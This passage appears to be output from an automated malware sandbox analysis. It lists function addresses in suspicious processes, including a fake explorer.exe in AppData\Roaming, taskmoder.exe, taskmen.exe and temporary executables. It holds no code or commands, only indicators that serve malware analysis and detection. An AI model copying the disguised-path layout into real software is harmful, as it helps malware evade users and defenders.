                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F462247_2_00007FF848F46224
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4BA987_2_00007FF848F4BA98
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F43AB77_2_00007FF848F43AB7
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F422D67_2_00007FF848F422D6
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F490FD7_2_00007FF848F490FD
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F548F97_2_00007FF848F548F9
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F549107_2_00007FF848F54910
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F431177_2_00007FF848F43117
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4B9187_2_00007FF848F4B918
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4195E7_2_00007FF848F4195E
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4B9607_2_00007FF848F4B960
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F489687_2_00007FF848F48968
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4116E7_2_00007FF848F4116E
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F441737_2_00007FF848F44173
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F5B1757_2_00007FF848F5B175
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F429F27_2_00007FF848F429F2
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F40C087_2_00007FF848F40C08
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F40C187_2_00007FF848F40C18
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4A4187_2_00007FF848F4A418
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4A4307_2_00007FF848F4A430
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F47C477_2_00007FF848F47C47
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4744A7_2_00007FF848F4744A
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F51C497_2_00007FF848F51C49
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F40C707_2_00007FF848F40C70
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F43CDA7_2_00007FF848F43CDA
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F46CEC7_2_00007FF848F46CEC
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F413107_2_00007FF848F41310
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4633B7_2_00007FF848F4633B
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F49B457_2_00007FF848F49B45
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F5734D7_2_00007FF848F5734D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F41B897_2_00007FF848F41B89
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F413AC7_2_00007FF848F413AC
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4A61D7_2_00007FF848F4A61D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F52E297_2_00007FF848F52E29
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4062D7_2_00007FF848F4062D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4A6407_2_00007FF848F4A640
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F436707_2_00007FF848F43670
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F43E707_2_00007FF848F43E70
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F45E827_2_00007FF848F45E82
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F49EB37_2_00007FF848F49EB3
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F466DF7_2_00007FF848F466DF
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4350C7_2_00007FF848F4350C
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F41D277_2_00007FF848F41D27
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F57D407_2_00007FF848F57D40
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F56D4D7_2_00007FF848F56D4D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F435807_2_00007FF848F43580
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F45D877_2_00007FF848F45D87
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F545A97_2_00007FF848F545A9
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F415CD7_2_00007FF848F415CD
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F410107_2_00007FF848F41010
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4B8107_2_00007FF848F4B810
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4781B7_2_00007FF848F4781B
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F5304D7_2_00007FF848F5304D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4B8607_2_00007FF848F4B860
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F440757_2_00007FF848F44075
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F420817_2_00007FF848F42081
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F458A27_2_00007FF848F458A2
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F450AA7_2_00007FF848F450AA
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F45F027_2_00007FF848F45F02
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F407187_2_00007FF848F40718
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F457287_2_00007FF848F45728
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F41F6B7_2_00007FF848F41F6B
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F46F687_2_00007FF848F46F68
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F40F737_2_00007FF848F40F73
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F4A77D7_2_00007FF848F4A77D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F43FED7_2_00007FF848F43FED
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 7_2_00007FF848F42FF37_2_00007FF848F42FF3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848FD32C111_2_00007FF848FD32C1
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F490FD15_2_00007FF848F490FD
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F4A77D15_2_00007FF848F4A77D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F4C8CE15_2_00007FF848F4C8CE
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F492D515_2_00007FF848F492D5
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F4A61D15_2_00007FF848F4A61D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F4A41815_2_00007FF848F4A418
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F4A43015_2_00007FF848F4A430
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F4C59115_2_00007FF848F4C591
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F49EB315_2_00007FF848F49EB3
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F56D4D15_2_00007FF848F56D4D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F5734D15_2_00007FF848F5734D
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F5778515_2_00007FF848F57785
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F4F2CE15_2_00007FF848F4F2CE
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F4F77615_2_00007FF848F4F776
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F51A7615_2_00007FF848F51A76
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F51C4915_2_00007FF848F51C49
                        Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 15_2_00007FF848F40F7315_2_00007FF848F40F73
                        Source: C:\Windows\Temp\ydztkyrb.exeCode function: 19_2_018D54D019_2_018D54D0
                        Source: C:\Windows\Temp\ydztkyrb.exeCode function: 19_2_018D135919_2_018D1359
                        Source: C:\Windows\Temp\ydztkyrb.exeCode function: 19_2_018D136819_2_018D1368
                        Source: C:\Windows\Temp\ydztkyrb.exeCode function: 19_2_018D54C019_2_018D54C0
                        Source: C:\Windows\Temp\ydztkyrb.exeCode function: 19_2_018D561F19_2_018D561F
                        Source: C:\Windows\Temp\ydztkyrb.exeCode function: 19_2_018D083819_2_018D0838
                        Source: C:\Windows\Temp\ydztkyrb.exeCode function: 19_2_018D084819_2_018D0848
                        Source: C:\Windows\Temp\swtpd1aw.exeCode function: 26_2_015D54D026_2_015D54D0
                        Source: C:\Windows\Temp\swtpd1aw.exeCode function: 26_2_015D135926_2_015D1359
                        Source: C:\Windows\Temp\swtpd1aw.exeCode function: 26_2_015D136826_2_015D1368
                        Source: C:\Windows\Temp\swtpd1aw.exeCode function: 26_2_015D54C026_2_015D54C0
                        Source: C:\Windows\Temp\swtpd1aw.exeCode function: 26_2_015D561F26_2_015D561F
                        Source: C:\Windows\Temp\swtpd1aw.exeCode function: 26_2_015D084826_2_015D0848
                        Source: C:\Windows\Temp\swtpd1aw.exeCode function: 26_2_015D083826_2_015D0838
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BD9CA831_2_00BD9CA8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDE8D831_2_00BDE8D8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDECC931_2_00BDECC9
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDC87131_2_00BDC871
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDB06031_2_00BDB060
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BD11A831_2_00BD11A8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDC98031_2_00BDC980
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDA20031_2_00BDA200
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDA3E031_2_00BDA3E0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDBBD031_2_00BDBBD0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDE8B431_2_00BDE8B4
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDA8D831_2_00BDA8D8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDA8D631_2_00BDA8D6
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDAC7031_2_00BDAC70
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDB05031_2_00BDB050
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDB9F831_2_00BDB9F8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDB9E731_2_00BDB9E7
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDBD4031_2_00BDBD40
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDBFCD31_2_00BDBFCD
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDBBCC31_2_00BDBBCC
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDE37931_2_00BDE379
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_00BDBF6431_2_00BDBF64
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A5DA031_2_010A5DA0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A243031_2_010A2430
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AECB031_2_010AECB0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A28D831_2_010A28D8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A770131_2_010A7701
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A213831_2_010A2138
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AE13831_2_010AE138
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010ACD3031_2_010ACD30
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AAD4831_2_010AAD48
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010ACD4031_2_010ACD40
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A5D9031_2_010A5D90
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A819031_2_010A8190
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A19C831_2_010A19C8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A19D831_2_010A19D8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A91F831_2_010A91F8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AEC9F31_2_010AEC9F
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A88B831_2_010A88B8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A28CB31_2_010A28CB
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A1CD831_2_010A1CD8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A1CE831_2_010A1CE8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A771031_2_010A7710
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A731731_2_010A7317
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A732831_2_010A7328
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AE3E831_2_010AE3E8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A920831_2_010A9208
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AECB031_2_010AECB0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AA61F31_2_010AA61F
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AEA3F31_2_010AEA3F
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AA63031_2_010AA630
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A9A5131_2_010A9A51
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A9A6031_2_010A9A60
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A9E8B31_2_010A9E8B
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A7EC931_2_010A7EC9
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AD6D131_2_010AD6D1
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010AD6E031_2_010AD6E0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_010A12F631_2_010A12F6
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_0292C60831_2_0292C608
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_0292D43831_2_0292D438
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_0292799831_2_02927998
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_0292490831_2_02924908
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_0292C0B831_2_0292C0B8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_0292307931_2_02923079
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_029257F831_2_029257F8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_029257EB31_2_029257EB
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_0292073831_2_02920738
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_0292072831_2_02920728
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_029255CB31_2_029255CB
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_0292250031_2_02922500
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_029248F831_2_029248F8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_02923C1831_2_02923C18
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 31_2_02923C0931_2_02923C09
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015F11D032_2_015F11D0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FBDC832_2_015FBDC8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FA1E032_2_015FA1E0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FA87832_2_015FA878
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FACA032_2_015FACA0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FCB6232_2_015FCB62
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FEB3032_2_015FEB30
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FE3C032_2_015FE3C0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FBBF032_2_015FBBF0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FA38032_2_015FA380
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FB25832_2_015FB258
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FEEDF32_2_015FEEDF
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FA1D032_2_015FA1D0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015F11C032_2_015F11C0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FBDBA32_2_015FBDBA
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FE5A132_2_015FE5A1
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FA86832_2_015FA868
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FAC8F32_2_015FAC8F
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FA37032_2_015FA370
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FEB1F32_2_015FEB1F
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FBBE032_2_015FBBE0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FBF9F32_2_015FBF9F
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FBBA032_2_015FBBA0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FB24732_2_015FB247
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_015FC22A32_2_015FC22A
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553211032_2_05532110
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553712832_2_05537128
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553D9F832_2_0553D9F8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05537D8932_2_05537D89
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_055314D132_2_055314D1
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_055378D832_2_055378D8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_055380E932_2_055380E9
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553189032_2_05531890
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553D4B032_2_0553D4B0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05532B0832_2_05532B08
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553EFF832_2_0553EFF8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_055323F832_2_055323F8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05535FA032_2_05535FA0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_055383A832_2_055383A8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05531E5032_2_05531E50
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553267032_2_05532670
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05535AB032_2_05535AB0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553955832_2_05539558
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553954832_2_05539548
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553A91032_2_0553A910
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553711832_2_05537118
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553A90132_2_0553A901
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553ED3132_2_0553ED31
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553D9E732_2_0553D9E7
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05537D9832_2_05537D98
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05539DA832_2_05539DA8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553E41032_2_0553E410
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553D01832_2_0553D018
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553B01F32_2_0553B01F
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553D00732_2_0553D007
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553240832_2_05532408
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553E42032_2_0553E420
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_055378E832_2_055378E8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553D4A032_2_0553D4A0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553A3D032_2_0553A3D0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05536BD032_2_05536BD0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_055307C032_2_055307C0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553A3C032_2_0553A3C0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05536BE032_2_05536BE0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553EFE832_2_0553EFE8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05535F9632_2_05535F96
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_055307B032_2_055307B0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553A20932_2_0553A209
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553E6C832_2_0553E6C8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05532AF832_2_05532AF8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_05535A9F32_2_05535A9F
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_0553E6B832_2_0553E6B8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076A073832_2_076A0738
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076ACDB032_2_076ACDB0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076A072932_2_076A0729
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076A251032_2_076A2510
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076ACDA232_2_076ACDA2
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076A48B032_2_076A48B0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076A489F32_2_076A489F
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076A57F032_2_076A57F0
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076A560832_2_076A5608
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076A30D832_2_076A30D8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076A3BE832_2_076A3BE8
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeCode function: 32_2_076A3BD732_2_076A3BD7
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBA20033_2_02CBA200
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBBBD033_2_02CBBBD0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBA3E033_2_02CBA3E0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBECC933_2_02CBECC9
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBE8D833_2_02CBE8D8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CB9CA833_2_02CB9CA8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBB06033_2_02CBB060
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBC87133_2_02CBC871
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBC98033_2_02CBC980
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBD59733_2_02CBD597
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CB11A833_2_02CB11A8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBBBC333_2_02CBBBC3
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBA3D033_2_02CBA3D0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBBF5B33_2_02CBBF5B
